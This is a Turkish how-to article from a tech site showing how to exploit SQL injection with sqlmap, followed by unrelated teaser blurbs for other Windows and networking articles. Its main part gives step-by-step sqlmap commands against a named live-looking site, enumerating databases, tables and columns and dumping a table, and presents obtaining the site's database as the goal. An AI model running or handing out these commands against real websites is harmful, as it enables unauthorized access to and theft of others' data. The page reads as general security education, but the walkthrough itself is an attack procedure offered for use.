Bu bölümde LuckyTemplates size SQL Injection'dan yararlanmak için kullanılan bazı araçları tanıtacaktır .
Şu anda birçok güvenlik açığı tarama aracı bulunmaktadır (SQL enjeksiyonu dahil). Bu araçlar, SQL enjeksiyon güvenlik açıklarının oldukça güçlü bir şekilde tespit edilmesine ve kullanılmasına olanak tanır. Yaygın olarak kullanılan otomatik SQL enjeksiyon güvenlik açığından yararlanma araçlarından bazıları şunlardır:
Ayrıca başvurabileceğiniz başka araçlar da vardır: Netsparker, jSQL Injection, Burp, BBQSQL...
Aşağıda temel SQL enjeksiyonundan yararlanmak için Sqlmap kullanımının bir demosu bulunmaktadır.
Sqlmap'i http://sqlmap.org/ adresinden indirebilirsiniz.
Sqlmap Python'da yazılmıştır, dolayısıyla bu aracı kullanmak için Python'u yüklemeniz gerekir. Python'u http://www.python.org/downloads/ adresinden indirebilirsiniz.
Öncelikle hedef web sitesini tanımlamanız gerekir, burada şu hedefim var: http://zerocoolhf.altervista.org/level1.php?id=1 (bu sayfa artık ölü).
Adım 1 : Cmd'yi açın ve aşağıdaki komutu yazın:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1”
sqlmap hedefin güvenlik açığını tespit edecek ve güvenlik açığı hakkında bilgi sağlayacaktır.
Adım 2 : Hedef web sitesinin SQL enjeksiyon güvenlik açığına sahip olduğunu belirledikten sonra veritabanı adını bulmaya devam ediyoruz.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs
=> Veritabanı: my_zerocoolhf
Adım 3 : Veritabanı ismini belirledikten sonra veritabanındaki tabloların isimlerini bulmaya devam edeceğiz.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf
=> Veritabanında 2 tablo var: auth ve kitap
Adım 4 : Tablodaki sütunların adlarını belirleyin
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book
=> Kitap tablosundaki sütunları tanımlayın: yazar, kimlik, fiyat, başlık.
Adım 5 : Verileri tablodan boşaltın.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book
=> Böylece hedef web sitesinin veritabanını elde ettik.
Yukarıda, SQL enjeksiyon hatalarından yararlanmak için sqlmap kullanımının temel bir demosu verilmiştir. İstismarın desteklenmesi için https://github.com/sqlmapproject/sqlmap/wiki/Usage adresinde sqlmap seçenekleri hakkında daha fazla bilgi edinebilirsiniz. SQL enjeksiyon istismarından yararlanma.
Ekranın sağ köşesinde bir Windows 10 etkinleştirme bildirimi görüyor musunuz? Bu makale, Windows 10'da telif hakkı isteği bildirimini nasıl sileceğiniz konusunda size rehberlik edecektir.
Microsoft yakın zamanda Windows 10 PC kullanıcıları için Derleme 14393.222 adlı en son toplu güncelleştirmeyi yayımladı. Windows 10 için yayımlanan bu güncelleme, esas olarak kullanıcı geri bildirimlerine dayalı olarak hataları düzeltiyor ve işletim sisteminin performans deneyimini geliştiriyor.
Yerel ağınızda harici erişime ihtiyaç duyan bilgisayarlarınız var mı? Ağınız için bir kale ana bilgisayarını ağ geçidi denetleyicisi olarak kullanmak iyi bir çözüm olabilir.
Bazen eski olay günlüklerinin tamamını bir kerede silmeniz gerekebilir. Bu kılavuzda Quantrimang.com, Windows 10 Olay Görüntüleyicisi'ndeki tüm olay günlüklerini hızlı bir şekilde silmenin 3 yolunu gösterecektir.
IBM Model M gibi fiziksel bir Windows tuşu içermeyen eski bir klasik klavye kullanmayı tercih ederseniz, sık kullanmadığınız bir anahtarı ödünç alarak daha fazlasını eklemenin kolay bir yöntemi vardır.
WindowTop, Windows 10 bilgisayarlarda çalışan tüm uygulama pencerelerini ve programlarını karartma özelliğine sahip bir araçtır.Ya da pencerelerde koyu arka planlı bir arayüz kullanabilirsiniz.
Daha önceki birçok makalemizde çevrimiçi ortamda anonim kalmanın son derece önemli olduğundan bahsetmiştik. Özel bilgilerin her yıl sızdırılması, çevrimiçi güvenliği giderek daha gerekli hale getiriyor. Sanal IP adreslerini kullanmamızın nedeni de budur. Aşağıda sahte IP'ler oluşturma yöntemlerini öğreneceğiz!
Windows 8'deki dil çubuğu, masaüstü ekranında otomatik olarak görüntülemek için tasarlanmış minyatür bir dil araç çubuğudur. Ancak, birçok kişi bu dil çubuğunu görev çubuğuna gizlemek istiyor.
İnternet hızını en üst düzeye çıkarmak, ağ bağlantınızı optimize etmek için çok önemlidir. Bilgisayarları, internete hazır TV'leri, oyun konsollarını vb. kullanarak en iyi eğlence ve iş deneyimini yaşayabilirsiniz.
Kablosuz bağlantı günümüzde bir zorunluluktur ve bu nedenle dahili ağınızın güvenliğini sağlamak için kablosuz güvenlik şarttır.
